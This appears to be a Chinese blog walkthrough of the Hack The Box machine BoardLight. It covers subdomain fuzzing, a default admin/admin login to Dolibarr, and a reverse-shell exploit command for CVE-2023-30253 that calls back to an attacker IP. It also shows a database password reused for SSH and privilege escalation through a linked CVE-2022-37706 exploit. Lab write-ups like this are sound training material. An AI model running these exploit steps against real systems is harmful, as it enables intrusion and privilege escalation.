糖果屋

HTB BoardLight

[toc]

image-20251021215738222

🟢 端口 135/tcp — MSRPC(Microsoft RPC Endpoint Mapper)

  • 常见服务Microsoft Windows RPC
  • 用途
  • RPC(Remote Procedure Call)是远程过程调用服务,用于让不同计算机上的进程通信。
  • 端口 135 是 RPC 的“端点映射器”,帮助客户端找到要访问的具体服务端口。

🟢 端口 445/tcp — Microsoft-DS(SMB)

  • 常见服务Microsoft Windows 7 - 10 microsoft-ds
  • 用途
  • SMB(Server Message Block)协议用于文件共享、打印共享、IPC 管道通信。
  • 445 是 SMB 直接运行在 TCP 上的端口(取代早期的 NetBIOS 139)。

枚举一下子域名

ffuf -u http://board.htb/ -H "Host: FUZZ.board.htb" -w /home/gw/桌面/test/fuzzDicts-master/subdomainDicts/main.txt -fc 302

image-20251021224448439

发现一个比较特殊的,加到hosts里看一下

这里遇到一个比较恶心的坑,就是如果直接在google搜索栏里面放crm.board.htb

image-20251106102309339

它大概是会进行这个东西的搜索,就像是搜索香蕉牛奶一样,所以需要在浏览器里输入一个完整的地址,http://crm.board.htb

进来是一个登录口,弱口令admin,admin登入

image-20251106102616203

简单搜搜发现有一个可以拿shell的漏洞

cve-2023-30253

https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253

python3 cve-2023-30253.py http://crm.board.htb admin admin 10.10.16.37 9001

尝试suid提权

image-20251106103910647

上脚本扫一扫,结合内核版本,似乎是有漏洞CVE-2021-3560

试了一下没通,继续尝试suid提权,蛋疼的是mount需要输入密码,www-data权限还是太低了

看了一眼wp,发现一个思维上的欠缺,就是当从站点这样的网站渗透进行的时候,可以查看网站的数据库用户和密码,大概率就可以ssh连接上,搜一搜Dolibarr配置文件的位置

这一步直接问gpt就可以找到位置

image-20251106140145968

dolibarrowner

serverfun2$2023!!

用这个名字登不上,意识到用户名可能还需要去home里面看一眼

larissa

发现enlightenment版本是0.23.1image-20251106140951812

cve-2022-37706

搜索后打cve-2022-37706

https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit/blob/main/exploit.sh

image-20251106141600389

心中无难事,只要肯放弃

site logo

Hi,Friend

© 2025 糖果屋